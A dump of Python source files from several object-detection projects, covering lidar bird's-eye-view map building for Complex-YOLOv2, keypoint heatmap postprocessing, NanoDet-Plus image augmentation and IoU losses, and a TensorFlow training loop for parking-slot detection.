z_points = pts[:, 2]
i_points = pts[:, 3]
# convert to pixel position values
x_img = (-y_points / self.voxel_size).astype(np.int32) # x axis is -y in LIDAR
y_img = (-x_points / self.voxel_size).astype(np.int32) # y axis is -x in LIDAR
# shift pixels to (0, 0)
x_img -= int(np.floor(self.y_min / self.voxel_size))
y_img += int(np.floor(self.x_max / self.voxel_size))
# clip height value
pixel_values = np.clip(a=z_points, a_min=self.z_min, a_max=self.z_max)
# rescale the height values
pixel_values = self.scale_to_255(pixel_values, min=self.z_min, max=self.z_max)
# initalize empty array
x_max = math.ceil((self.y_max - self.y_min) / self.voxel_size)
y_max = math.ceil((self.x_max - self.x_min) / self.voxel_size)
# Height Map & Intensity Map & Density Map
height_map = np.zeros((y_max, x_max), dtype=np.float32)
intensity_map = np.zeros((y_max, x_max), dtype=np.float32)
density_map = np.zeros((y_max, x_max), dtype=np.float32)
for k in range(0, len(pixel_values)):
if pixel_values[k] > height_map[y_img[k], x_img[k]]:
height_map[y_img[k], x_img[k]] = pixel_values[k]
if i_points[k] > intensity_map[y_img[k], x_img[k]]:
intensity_map[y_img[k], x_img[k]] = i_points[k]
density_map[y_img[k], x_img[k]] += 1
for j in range(0, y_max):
for i in range(0, x_max):
if density_map[j, i] > 0:
density_map[j, i] = np.minimum(1.0, np.log(density_map[j, i] + 1) / np.log(64))
height_map /= 255.0
intensity_map /= 255.0
rgb_map = np.zeros((y_max, x_max, 3), dtype=np.float32)
rgb_map[:, :, 0] = density_map # r_map
rgb_map[:, :, 1] = height_map # g_map
rgb_map[:, :, 2] = intensity_map # b_map
return rgb_map
def filter_roi(self, pts):
mask = np.where((pts[:, 0] >= self.x_min) & (pts[:, 0] <= self.x_max) &
(pts[:, 1] >= self.y_min) & (pts[:, 1] <= self.y_max) &
(pts[:, 2] >= self.z_min) & (pts[:, 2] <= self.z_max))
pts = pts[mask]
return pts
def preprocess_true_data(self, image, labels):
image = np.array(image)
image, labels = random_horizontal_flip(image, labels)
anchor_array = np.array(model_params['anchors'], dtype=np.float32)
n_anchors = np.shape(anchor_array)[0]
valid = (np.sum(labels, axis=-1) > 0).tolist()
labels = labels[valid]
y_true = np.zeros(shape=[self.grid_height, self.grid_width, n_anchors, (6 + 1 + self.num_classes)], dtype=np.float32)
boxes_xy = labels[:, 0:2]
boxes_wh = labels[:, 2:4]
boxes_angle = labels[:, 4:5]
true_boxes = np.concatenate([boxes_xy, boxes_wh, boxes_angle], axis=-1)
anchors_max = anchor_array / 2.
anchors_min = - anchor_array / 2.
valid_mask = boxes_wh[:, 0] > 0
wh = boxes_wh[valid_mask]
# [N, 1, 2]
wh = np.expand_dims(wh, -2)
boxes_max = wh / 2.
boxes_min = - wh / 2.
# [N, 1, 2] & [5, 2] ==> [N, 5, 2]
intersect_mins = np.maximum(boxes_min, anchors_min)
intersect_maxs = np.minimum(boxes_max, anchors_max)
# [N, 5, 2]
intersect_wh = np.maximum(intersect_maxs - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
box_area = wh[..., 0] * wh[..., 1]
anchor_area = anchor_array[:, 0] * anchor_array[:, 1]
# [N, 5]
iou = intersect_area / (box_area + anchor_area - intersect_area + tf.keras.backend.epsilon())
# Find best anchor for each true box [N]
best_anchor = np.argmax(iou, axis=-1)
for t, k in enumerate(best_anchor):
i = int(np.floor(true_boxes[t, 0] / 32.))
j = int(np.floor(true_boxes[t, 1] / 32.))
c = labels[t, 5].astype('int32')
y_true[j, i, k, 0:4] = true_boxes[t, 0:4]
re = np.cos(true_boxes[t, 4])
im = np.sin(true_boxes[t, 4])
#print('|', j, i, k, c, t, true_boxes[t, 0], true_boxes[t, 1])
y_true[j, i, k, 4] = re
y_true[j, i, k, 5] = im
y_true[j, i, k, 6] = 1
y_true[j, i, k, 7 + c] = 1
return image, y_true
```
#### File: Complex-YOLOv2/utils/dataset_utils.py
```python
import os
import numpy as np
import tensorflow as tf
from model import network
from cfg.config import path_params, model_params
from tensorflow.python.framework import graph_util
def total_sample(file_name):
sample_nums = 0
for record in tf.python_io.tf_record_iterator(file_name):
sample_nums += 1
return sample_nums
def create_trainval_txt(root_path):
data_path = os.path.join(root_path, 'object/training/livox')
trainval = os.path.join(root_path, 'ImageSets/Main/trainval.txt')
if os.path.exists(trainval):
os.remove(trainval)
file_obj = open(trainval, 'w', encoding='utf-8')
file_list = os.listdir(data_path)
for file in file_list:
filename = os.path.splitext(file)[0]
file_obj.writelines(filename)
file_obj.write('\n')
file_obj.close()
def freeze_graph(checkpoints_path, output_graph):
"""
:param checkpoints_path: ckpt文件路径
:param output_graph: pb模型保存路径
:return:
"""
with tf.Graph().as_default():
image = tf.placeholder(shape=[None, 608, 608, 3], dtype=tf.float32, name='inputs')
# 指定输出的节点名称,该节点名称必须是原模型中存在的节点
output_node_names = "reorg_layer/obj_probs,reorg_layer/class_probs,reorg_layer/bboxes_probs"
# 从模型代码中获取结构
Model = network.Network(is_train=False)
logits = Model.build_network(image)
output = Model.reorg_layer(logits, model_params['anchors'])
# 从meta中获取结构
#saver = tf.train.import_meta_graph(checkpoints_path + '.meta', clear_devices=True)
# 获得默认的图
graph = tf.get_default_graph()
# 返回一个序列化的图代表当前的图
input_graph_def = graph.as_graph_def()
with tf.Session() as sess:
saver = tf.train.Saver()
# 恢复图并得到数据
saver.restore(sess, checkpoints_path)
# 模型持久化,将变量值固定
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=input_graph_def,
output_node_names=output_node_names.split(","))
# 删除训练层,只保留主干
output_graph_def = graph_util.remove_training_nodes(
output_graph_def)
# 保存模型
with tf.gfile.GFile(output_graph, "wb") as f:
# 序列化输出
f.write(output_graph_def.SerializeToString())
# 得到当前图有几个操作节点
print("%d ops in the final graph." %len(output_graph_def.node))
# for op in graph.get_operations():
# print(op.name, op.values())
if __name__ == '__main__':
#create_trainval_txt(path_params['data_path'])
input_checkpoint='/home/chenwei/HDD/Project/Complex-YOLOv2/checkpoints/model.ckpt-43'
out_pb_path="/home/chenwei/HDD/Project/Complex-YOLOv2/pb/frozen_model.pb"
freeze_graph(input_checkpoint, out_pb_path)
``` |
{
"source": "530824679/KPROI",
"score": 2
} |
#### File: KPROI/utils/postprocess.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
def get_max_preds(batch_heatmaps):
'''
get predictions from score maps
heatmaps: numpy.ndarray([batch_size, num_joints, height, width])
'''
assert isinstance(batch_heatmaps, np.ndarray), 'batch_heatmaps should be numpy.ndarray'
assert batch_heatmaps.ndim == 4, 'batch_images should be 4-ndim'
batch_size = batch_heatmaps.shape[0]
num_joints = batch_heatmaps.shape[1]
width = batch_heatmaps.shape[3]
heatmaps_reshaped = batch_heatmaps.reshape((batch_size, num_joints, -1))
idx = np.argmax(heatmaps_reshaped, 2)
maxvals = np.amax(heatmaps_reshaped, 2)
maxvals = maxvals.reshape((batch_size, num_joints, 1))
idx = idx.reshape((batch_size, num_joints, 1))
preds = np.tile(idx, (1, 1, 2)).astype(np.float32)
preds[:, :, 0] = (preds[:, :, 0]) % width
preds[:, :, 1] = np.floor((preds[:, :, 1]) / width)
pred_mask = np.tile(np.greater(maxvals, 0.0), (1, 1, 2))
pred_mask = pred_mask.astype(np.float32)
preds *= pred_mask
return preds, maxvals
```
#### File: KPROI/utils/preprocess.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
def filter_dataset(data_dir):
"""
交替遍历images和labels两个文件夹,删除未对应的数据
param data_dir: 数据根目录,包含两个子目录images和labels
"""
images_dir = os.path.join(data_dir, "images")
labels_dir = os.path.join(data_dir, "labels")
file_list = os.listdir(images_dir)
for file in file_list:
filename = os.path.splitext(file)[0]
path = os.path.join(labels_dir, filename) + '.json'
if not os.path.exists(path):
os.remove(os.path.join(images_dir, file))
def write_txt(img_dir, label_dir):
train_list = []
filelist = os.listdir(label_dir)
for filename in filelist:
try:
train_list.append(os.path.splitext(filename)[0])
except:
print(filename + 'wrong')
continue
with open(os.path.join(img_dir, 'index.txt'), 'w') as index_file:
for text in train_list:
# print(text)
index_file.write(text + '\n')
if __name__ == '__main__':
# filter_dataset("/home/chenwei/HDD/Project/private/KPROI/datas/training")
write_txt("F:\\img", "F:\\anno")
``` |
{
"source": "530824679/NanoDet-Plus",
"score": 3
} |
#### File: NanoDet-Plus/dataset/augment.py
```python
import cv2
import math
import random
import numpy as np
def random_brightness(image, delta):
image += random.uniform(-delta, delta)
return image
def random_contrast(image, alpha_low, alpha_up):
image *= random.uniform(alpha_low, alpha_up)
return image
def random_saturation(image, alpha_low, alpha_up):
hsv_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_BGR2HSV)
hsv_image[..., 1] *= random.uniform(alpha_low, alpha_up)
image = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR)
return image
def normalize(meta, mean, std):
image = meta['image'].astype(np.float32)
mean = np.array(mean, dtype=np.float64).reshape(1, -1)
stdinv = 1 / np.array(std, dtype=np.float64).reshape(1, -1)
cv2.subtract(image, mean, image)
cv2.multiply(image, stdinv, image)
meta['image'] = image
return meta
def _normalize(image, mean, std):
mean = np.array(mean, dtype=np.float32).reshape(1, 1, 3) / 255
std = np.array(std, dtype=np.float32).reshape(1, 1, 3) / 255
image = (image - mean) / std
return image
def color_aug_and_norm(meta, kwargs):
image = meta['image'].astype(np.float32) / 255
if 'brightness' in kwargs and random.randint(0, 1):
image = random_brightness(image, kwargs['brightness'])
if 'contrast' in kwargs and random.randint(0, 1):
image = random_contrast(image, *kwargs['contrast'])
if 'saturation' in kwargs and random.randint(0, 1):
image = random_saturation(image, *kwargs['saturation'])
# cv2.imshow('trans', img)
# cv2.waitKey(0)
image = _normalize(image, *kwargs['normalize'])
meta['image'] = image
return meta
def get_flip_matrix(prob=0.5):
F = np.eye(3)
if random.random() < prob:
F[0, 0] = -1
return F
def get_perspective_matrix(perspective=0):
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
return P
def get_rotation_matrix(degree=0):
R = np.eye(3)
a = random.uniform(-degree, degree)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=1)
return R
def get_scale_matrix(ratio=(1, 1)):
Scl = np.eye(3)
scale = random.uniform(*ratio)
Scl[0, 0] *= scale
Scl[1, 1] *= scale
return Scl
def get_stretch_matrix(width_ratio=(1, 1), height_ratio=(1, 1)):
Str = np.eye(3)
Str[0, 0] *= random.uniform(*width_ratio)
Str[1, 1] *= random.uniform(*height_ratio)
return Str
def get_shear_matrix(degree):
Sh = np.eye(3)
Sh[0, 1] = math.tan(random.uniform(-degree, degree) * math.pi / 180) # x shear (deg)
Sh[1, 0] = math.tan(random.uniform(-degree, degree) * math.pi / 180) # y shear (deg)
return Sh
def get_translate_matrix(translate, width, height):
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation
return T
def get_resize_matrix(raw_shape, dst_shape, keep_ratio):
"""
Get resize matrix for resizing raw img to input size
:param raw_shape: (width, height) of raw image
:param dst_shape: (width, height) of input image
:param keep_ratio: whether keep original ratio
:return: 3x3 Matrix
"""
r_w, r_h = raw_shape
d_w, d_h = dst_shape
Rs = np.eye(3)
if keep_ratio:
C = np.eye(3)
C[0, 2] = - r_w / 2
C[1, 2] = - r_h / 2
if r_w / r_h < d_w / d_h:
ratio = d_h / r_h
else:
ratio = d_w / r_w
Rs[0, 0] *= ratio
Rs[1, 1] *= ratio
T = np.eye(3)
T[0, 2] = 0.5 * d_w
T[1, 2] = 0.5 * d_h
return T @ Rs @ C
else:
Rs[0, 0] *= d_w / r_w
Rs[1, 1] *= d_h / r_h
return Rs
def warp_and_resize(meta, warp_kwargs, dst_shape, keep_ratio=True):
raw_img = meta['image']
height = raw_img.shape[0] # shape(h,w,c)
width = raw_img.shape[1]
# center
C = np.eye(3)
C[0, 2] = - width / 2
C[1, 2] = - height / 2
# do not change the order of mat mul
if 'perspective' in warp_kwargs and random.randint(0, 1):
P = get_perspective_matrix(warp_kwargs['perspective'])
C = P @ C
if 'scale' in warp_kwargs and random.randint(0, 1):
Scl = get_scale_matrix(warp_kwargs['scale'])
C = Scl @ C
if 'stretch' in warp_kwargs and random.randint(0, 1):
Str = get_stretch_matrix(*warp_kwargs['stretch'])
C = Str @ C
if 'rotation' in warp_kwargs and random.randint(0, 1):
R = get_rotation_matrix(warp_kwargs['rotation'])
C = R @ C
if 'shear' in warp_kwargs and random.randint(0, 1):
Sh = get_shear_matrix(warp_kwargs['shear'])
C = Sh @ C
if 'flip' in warp_kwargs:
F = get_flip_matrix(warp_kwargs['flip'])
C = F @ C
if 'translate' in warp_kwargs and random.randint(0, 1):
T = get_translate_matrix(warp_kwargs['translate'], width, height)
else:
T = get_translate_matrix(0, width, height)
M = T @ C
# M = T @ Sh @ R @ Str @ P @ C
ResizeM = get_resize_matrix((width, height), dst_shape, keep_ratio)
M = ResizeM @ M
image = cv2.warpPerspective(raw_img, M, dsize=tuple(dst_shape))
meta['image'] = image
meta['warp_matrix'] = M
if 'gt_bboxes' in meta:
boxes = meta['gt_bboxes']
meta['gt_bboxes'] = warp_boxes(boxes, M, dst_shape[0], dst_shape[1])
if 'gt_masks' in meta:
for i, mask in enumerate(meta['gt_masks']):
meta['gt_masks'][i] = cv2.warpPerspective(mask, M, dsize=tuple(dst_shape))
return meta
def warp_boxes(boxes, M, width, height):
n = len(boxes)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = boxes[:, [0, 1, 2, 3, 0, 3, 2, 1]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
return xy.astype(np.float32)
else:
return boxes
```
#### File: NanoDet-Plus/loss/iou_loss.py
```python
import math
import torch
import torch.nn as nn
def bbox_overlaps(bboxes1, bboxes2, mode='iou', is_aligned=False, eps=1e-6):
assert mode in ['iou', 'giou', 'diou', 'ciou'], f'Unsupported mode {mode}'
assert (bboxes1.size(-1) == 4 or bboxes1.size(0) == 0)
assert (bboxes2.size(-1) == 4 or bboxes2.size(0) == 0)
assert bboxes1.shape[:-2] == bboxes2.shape[:-2]
batch_shape = bboxes1.shape[:-2]
rows = bboxes1.size(-2)
cols = bboxes2.size(-2)
if is_aligned:
assert rows == cols
if rows * cols == 0:
if is_aligned:
return bboxes1.new(batch_shape + (rows,))
else:
return bboxes1.new(batch_shape + (rows, cols))
area1 = (bboxes1[..., 2] - bboxes1[..., 0]) * (bboxes1[..., 3] - bboxes1[..., 1])
area2 = (bboxes2[..., 2] - bboxes2[..., 0]) * (bboxes2[..., 3] - bboxes2[..., 1])
if is_aligned:
lt = torch.max(bboxes1[..., :2], bboxes2[..., :2]) # [B, rows, 2]
rb = torch.min(bboxes1[..., 2:], bboxes2[..., 2:]) # [B, rows, 2]
wh = (rb - lt).clamp(min=0) # [B, rows, 2]
overlap = wh[..., 0] * wh[..., 1]
if mode in ['iou', 'giou']:
union = area1 + area2 - overlap
else:
union = area1
if mode == 'giou':
enclosed_lt = torch.min(bboxes1[..., :2], bboxes2[..., :2])
enclosed_rb = torch.max(bboxes1[..., 2:], bboxes2[..., 2:])
else:
lt = torch.max(bboxes1[..., :, None, :2], bboxes2[..., None, :, :2]) # [B, rows, cols, 2]
rb = torch.min(bboxes1[..., :, None, 2:], bboxes2[..., None, :, 2:]) # [B, rows, cols, 2]
wh = (rb - lt).clamp(min=0) # [B, rows, cols, 2]
overlap = wh[..., 0] * wh[..., 1]
if mode in ['iou', 'giou']:
union = area1[..., None] + area2[..., None, :] - overlap
else:
union = area1[..., None]
if mode == 'giou':
enclosed_lt = torch.min(bboxes1[..., :, None, :2], bboxes2[..., None, :, :2])
enclosed_rb = torch.max(bboxes1[..., :, None, 2:], bboxes2[..., None, :, 2:])
eps = union.new_tensor([eps])
union = torch.max(union, eps)
ious = overlap / union
if mode in ['iou', 'iof']:
return ious
# calculate gious
enclose_wh = (enclosed_rb - enclosed_lt).clamp(min=0)
enclose_area = enclose_wh[..., 0] * enclose_wh[..., 1]
enclose_area = torch.max(enclose_area, eps)
gious = ious - (enclose_area - union) / enclose_area
return gious
@weighted_loss
def iou_loss(pred, target, eps=1e-6):
ious = bbox_overlaps(pred, target, is_aligned=True).clamp(min=eps)
loss = -ious.log()
return loss
@weighted_loss
def giou_loss(pred, target, eps=1e-7):
gious = bbox_overlaps(pred, target, mode='giou', is_aligned=True, eps=eps)
loss = 1 - gious
return loss
@weighted_loss
def diou_loss(pred, target, eps=1e-7):
# overlap
lt = torch.max(pred[:, :2], target[:, :2])
rb = torch.min(pred[:, 2:], target[:, 2:])
wh = (rb - lt).clamp(min=0)
overlap = wh[:, 0] * wh[:, 1]
# union
ap = (pred[:, 2] - pred[:, 0]) * (pred[:, 3] - pred[:, 1])
ag = (target[:, 2] - target[:, 0]) * (target[:, 3] - target[:, 1])
union = ap + ag - overlap + eps
# IoU
ious = overlap / union
# enclose area
enclose_x1y1 = torch.min(pred[:, :2], target[:, :2])
enclose_x2y2 = torch.max(pred[:, 2:], target[:, 2:])
enclose_wh = (enclose_x2y2 - enclose_x1y1).clamp(min=0)
cw = enclose_wh[:, 0]
ch = enclose_wh[:, 1]
c2 = cw**2 + ch**2 + eps
b1_x1, b1_y1 = pred[:, 0], pred[:, 1]
b1_x2, b1_y2 = pred[:, 2], pred[:, 3]
b2_x1, b2_y1 = target[:, 0], target[:, 1]
b2_x2, b2_y2 = target[:, 2], target[:, 3]
left = ((b2_x1 + b2_x2) - (b1_x1 + b1_x2))**2 / 4
right = ((b2_y1 + b2_y2) - (b1_y1 + b1_y2))**2 / 4
rho2 = left + right
# DIoU
dious = ious - rho2 / c2
loss = 1 - dious
return loss
@weighted_loss
def ciou_loss(pred, target, eps=1e-7):
# overlap
lt = torch.max(pred[:, :2], target[:, :2])
rb = torch.min(pred[:, 2:], target[:, 2:])
wh = (rb - lt).clamp(min=0)
overlap = wh[:, 0] * wh[:, 1]
# union
ap = (pred[:, 2] - pred[:, 0]) * (pred[:, 3] - pred[:, 1])
ag = (target[:, 2] - target[:, 0]) * (target[:, 3] - target[:, 1])
union = ap + ag - overlap + eps
# IoU
ious = overlap / union
# enclose area
enclose_x1y1 = torch.min(pred[:, :2], target[:, :2])
enclose_x2y2 = torch.max(pred[:, 2:], target[:, 2:])
enclose_wh = (enclose_x2y2 - enclose_x1y1).clamp(min=0)
cw = enclose_wh[:, 0]
ch = enclose_wh[:, 1]
c2 = cw**2 + ch**2 + eps
b1_x1, b1_y1 = pred[:, 0], pred[:, 1]
b1_x2, b1_y2 = pred[:, 2], pred[:, 3]
b2_x1, b2_y1 = target[:, 0], target[:, 1]
b2_x2, b2_y2 = target[:, 2], target[:, 3]
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
left = ((b2_x1 + b2_x2) - (b1_x1 + b1_x2))**2 / 4
right = ((b2_y1 + b2_y2) - (b1_y1 + b1_y2))**2 / 4
rho2 = left + right
factor = 4 / math.pi**2
v = factor * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
# CIoU
cious = ious - (rho2 / c2 + v**2 / (1 - ious + v))
loss = 1 - cious
return loss
class IoULoss(nn.Module):
def __init__(self, eps=1e-6, reduction='mean', loss_weight=1.0):
super(IoULoss, self).__init__()
self.eps = eps
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self, pred, target, weight=None, avg_factor=None, reduction_override=None, **kwargs):
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if (weight is not None) and (not torch.any(weight > 0)) and (reduction != 'none'):
return (pred * weight).sum() # 0
if weight is not None and weight.dim() > 1:
assert weight.shape == pred.shape
weight = weight.mean(-1)
loss = self.loss_weight * iou_loss(pred, target, weight, eps=self.eps, reduction=reduction, avg_factor=avg_factor, **kwargs)
return loss
class GIoULoss(nn.Module):
def __init__(self, eps=1e-6, reduction='mean', loss_weight=1.0):
super(GIoULoss, self).__init__()
self.eps = eps
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self, pred, target, weight=None, avg_factor=None, reduction_override=None, **kwargs):
if weight is not None and not torch.any(weight > 0):
# return (pred * weight).sum() # 0 #TODO: fix bug
return pred.sum() * 0. # 0
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if weight is not None and weight.dim() > 1:
assert weight.shape == pred.shape
weight = weight.mean(-1)
loss = self.loss_weight * giou_loss(pred, target, weight, eps=self.eps, reduction=reduction, avg_factor=avg_factor, **kwargs)
return loss
class DIoULoss(nn.Module):
def __init__(self, eps=1e-6, reduction='mean', loss_weight=1.0):
super(DIoULoss, self).__init__()
self.eps = eps
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self, pred, target, weight=None, avg_factor=None, reduction_override=None, **kwargs):
if weight is not None and not torch.any(weight > 0):
return (pred * weight).sum() # 0
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if weight is not None and weight.dim() > 1:
assert weight.shape == pred.shape
weight = weight.mean(-1)
loss = self.loss_weight * diou_loss(pred, target, weight, eps=self.eps, reduction=reduction, avg_factor=avg_factor, **kwargs)
return loss
class CIoULoss(nn.Module):
def __init__(self, eps=1e-6, reduction='mean', loss_weight=1.0):
super(CIoULoss, self).__init__()
self.eps = eps
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self, pred, target, weight=None, avg_factor=None, reduction_override=None, **kwargs):
if weight is not None and not torch.any(weight > 0):
return (pred * weight).sum() # 0
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if weight is not None and weight.dim() > 1:
assert weight.shape == pred.shape
weight = weight.mean(-1)
loss = self.loss_weight * ciou_loss(pred, target, weight, eps=self.eps, reduction=reduction, avg_factor=avg_factor, **kwargs)
return loss
``` |
{
"source": "530824679/Parking-slot-Detection",
"score": 2
} |
#### File: 530824679/Parking-slot-Detection/train.py
```python
import os
import math
import shutil
import numpy as np
import tensorflow as tf
import glog as log
from cfg.config import path_params, model_params, solver_params
from model.network import Network
from data import dataset, tfrecord
from utils.data_utils import *
def config_warmup_lr(global_step, warmup_steps, name):
with tf.variable_scope(name_or_scope=name):
warmup_init_learning_rate = solver_params['init_learning_rate'] / 1000.0
factor = tf.math.pow(solver_params['init_learning_rate'] / warmup_init_learning_rate, 1.0 / warmup_steps)
warmup_lr = warmup_init_learning_rate * tf.math.pow(factor, global_step)
return warmup_lr
def config_cosine_lr(steps, batch_size, num_epochs, name):
with tf.variable_scope(name_or_scope=name):
lr_init = 0.008 * batch_size / 64
warmup_init = 0.0008
warmup_step = steps
decay_steps = tf.cast((num_epochs - 1) * warmup_step, tf.float32)
linear_warmup = tf.cast(steps, dtype=tf.float32) / warmup_step * (lr_init - warmup_init)
cosine_lr = 0.5 * lr_init * (1 + tf.cos(math.pi * tf.cast(steps, tf.float32) / decay_steps))
lr = tf.where(steps < warmup_step, warmup_init + linear_warmup, cosine_lr)
return lr
def config_optimizer(optimizer_name, lr_init, momentum=0.99):
log.info("message:配置优化器:'" + str(optimizer_name) + "'")
if optimizer_name == 'momentum':
return tf.train.MomentumOptimizer(learning_rate=lr_init, momentum=momentum)
elif optimizer_name == 'adam':
return tf.train.AdamOptimizer(learning_rate=lr_init)
elif optimizer_name == 'sgd':
return tf.train.GradientDescentOptimizer(learning_rate=lr_init)
else:
log.error("error:不支持的优化器类型:'" + str(optimizer_name) + "'")
raise ValueError(str(optimizer_name) + ":不支持的优化器类型")
def compute_curr_epoch(global_step, batch_size, image_num):
epoch = global_step * batch_size / image_num
return tf.cast(epoch, tf.int32)
def train():
start_step = 0
input_height = model_params['input_height']
input_width = model_params['input_width']
num_epochs = solver_params['total_epoches']
batch_size = solver_params['batch_size']
checkpoint_dir = path_params['checkpoints_dir']
tfrecord_dir = path_params['tfrecord_dir']
log_dir = path_params['logs_dir']
initial_weight = path_params['initial_weight']
restore = solver_params['restore']
classes = read_class_names(path_params['class_file'])
class_num = len(classes)
# 创建相关目录
ckpt_path = path_params['checkpoints_dir']
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
logs_path = path_params['logs_dir']
if os.path.exists(logs_path):
shutil.rmtree(logs_path)
os.makedirs(logs_path)
# 配置GPU资源
gpu_options = tf.ConfigProto(allow_soft_placement=True)
gpu_options.gpu_options.allow_growth = True
gpu_options.gpu_options.allocator_type = 'BFC'
# 解析得到训练样本以及标注
data = tfrecord.TFRecord()
train_tfrecord = os.path.join(tfrecord_dir, "train.tfrecord")
data_num = total_sample(train_tfrecord)
batch_num = int(math.ceil(float(data_num) / batch_size))
dataset = data.create_dataset(train_tfrecord, batch_num, batch_size=batch_size, is_shuffle=False)
# 创建训练和验证数据迭代器
iterator = dataset.make_one_shot_iterator()
inputs, y_true_1, y_true_2, y_true_3 = iterator.get_next()
inputs.set_shape([None, input_height, input_width, 3])
y_true_1.set_shape([None, 20, 20, 3, 5 + class_num])
y_true_2.set_shape([None, 40, 40, 3, 5 + class_num])
y_true_3.set_shape([None, 80, 80, 3, 5 + class_num])
y_true = [y_true_1, y_true_2, y_true_3]
# 构建网络计算损失
with tf.variable_scope('ODET'):
model = Network(is_train=True)
logits = model.forward(inputs)
# 计算损失
loss_op = model.calc_loss(logits, y_true)
l2_loss = tf.losses.get_regularization_loss()
total_loss = loss_op[0] + loss_op[1] + loss_op[2] + loss_op[3] + l2_loss
# define training op
global_step = tf.Variable(float(0), dtype=tf.float64, trainable=False, collections=[tf.GraphKeys.LOCAL_VARIABLES])
learning_rate = config_cosine_lr(batch_num, batch_size, num_epochs, 'learning_lr')
#optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.937)
optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=0.99)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
#train_op = optimizer.minimize(total_loss, global_step=global_step)
gvs = optimizer.compute_gradients(total_loss)
clip_grad_var = [gv if gv[0] is None else [tf.clip_by_norm(gv[0], 5.), gv[1]] for gv in gvs]
train_op = optimizer.apply_gradients(clip_grad_var, global_step=global_step)
# 模型保存
loader = tf.train.Saver()#tf.moving_average_variables())
save_variable = tf.global_variables()
saver = tf.train.Saver(save_variable, max_to_keep=1000)
# 配置tensorboard
tf.summary.scalar('learn_rate', learning_rate)
tf.summary.scalar("xy_loss", loss_op[0])
tf.summary.scalar("wh_loss", loss_op[1])
tf.summary.scalar("conf_loss", loss_op[2])
tf.summary.scalar("class_loss", loss_op[3])
tf.summary.scalar('total_loss', total_loss)
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph(), flush_secs=60)
# 开始训练
with tf.Session(config=gpu_options) as sess:
sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
if restore == True:
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
stem = os.path.basename(ckpt.model_checkpoint_path)
restore_step = int(stem.split('.')[0].split('-')[-1])
start_step = restore_step
sess.run(global_step.assign(restore_step))
loader.restore(sess, ckpt.model_checkpoint_path)
print('Restoreing from {}'.format(ckpt.model_checkpoint_path))
else:
print("Failed to find a checkpoint")
summary_writer.add_graph(sess.graph)
try:
print('=> Restoring weights from: %s ... ' % initial_weight)
loader.restore(sess, initial_weight)
except:
print('=> %s does not exist !!!' % initial_weight)
print('=> Now it starts to train from scratch ...')
print('\n----------- start to train -----------\n')
for epoch in range(start_step + 1, num_epochs):
train_epoch_loss, train_epoch_xy_loss, train_epoch_wh_loss, train_epoch_confs_loss, train_epoch_class_loss = [], [], [], [], []
for index in tqdm(range(batch_num)):
_, summary_, loss_, xy_loss_, wh_loss_, confs_loss_, class_loss_, global_step_, lr = sess.run(
[train_op, summary_op, total_loss, loss_op[0], loss_op[1], loss_op[2], loss_op[3], global_step, learning_rate])
train_epoch_loss.append(loss_)
train_epoch_xy_loss.append(xy_loss_)
train_epoch_wh_loss.append(wh_loss_)
train_epoch_confs_loss.append(confs_loss_)
train_epoch_class_loss.append(class_loss_)
summary_writer.add_summary(summary_, global_step_)
train_epoch_loss, train_epoch_xy_loss, train_epoch_wh_loss, train_epoch_confs_loss, train_epoch_class_loss = np.mean(train_epoch_loss), np.mean(train_epoch_xy_loss), np.mean(train_epoch_wh_loss), np.mean(train_epoch_confs_loss), np.mean(train_epoch_class_loss)
print("Epoch: {}, global_step: {}, lr: {:.8f}, total_loss: {:.3f}, xy_loss: {:.3f}, wh_loss: {:.3f}, confs_loss: {:.3f}, class_loss: {:.3f}".format(epoch, global_step_, lr, train_epoch_loss, train_epoch_xy_loss, train_epoch_wh_loss, train_epoch_confs_loss, train_epoch_class_loss))
snapshot_model_name = 'odet_train_mloss={:.4f}.ckpt'.format(train_epoch_loss)
saver.save(sess, os.path.join(checkpoint_dir, snapshot_model_name), global_step=epoch)
sess.close()
if __name__ == '__main__':
train()
```
#### File: Parking-slot-Detection/utils/data_utils.py
```python
import os
